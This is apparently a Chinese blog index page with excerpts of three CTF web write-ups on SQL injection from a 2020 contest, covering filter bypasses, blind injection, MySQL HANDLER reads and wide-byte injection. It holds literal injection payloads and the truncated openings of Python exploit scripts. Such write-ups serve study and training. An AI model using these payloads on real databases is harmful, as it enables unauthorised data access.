刘功瑞的博客
有一天你突然惊醒,发现这一切,都只不过是一场梦。
2020年02月22日
2020年新春战“疫”—网络安全公益赛 Web Ezsqli Writeup(sql注入,过滤or,无法获取表名列名的解决办法)
测试出注入点2-(ascii(substr(database(),1,1))>1)由于过滤了or和union select,无法通过常规手段获取表名和字段名,使用mysql5.7新特性获得表名,使用select语句比较时按各字段进行比较的特点,来构造盲注语句,代码如下:#encoding=utf-8
import requests
def str_to_hex(s):
return '
作者:admin , 分类:CTF , 浏览:507 , 评论:0
2020年02月22日
2020年新春战“疫”—网络安全公益赛 Web blacklist Writeup(sql注入,mysql handler函数)
熟悉的界面,点击输入框,出现以前的题输入过的payload,试一试就得到了flag,应该是原题1';show tables;#1';handler FlagHere open;handler FlagHere read first;#
作者:admin , 分类:CTF , 浏览:495 , 评论:0
2020年02月22日
2020年新春战“疫”—网络安全公益赛 Web easysqli_copy Writeup(sql注入,宽字节注入+存储过程绕过+语句转十六进制)
宽字节注入+存储过程绕过+语句转十六进制脚本如下import requests
flag = ""
cookie = {
'ci_session': '934c5dbfca4a789a17b73c1f36c6ec78b81b02b3',
'UM_distinctid
作者:admin , 分类:CTF , 浏览:626 , 评论:0
- 搜索
- 文章归档
- 友情链接
-
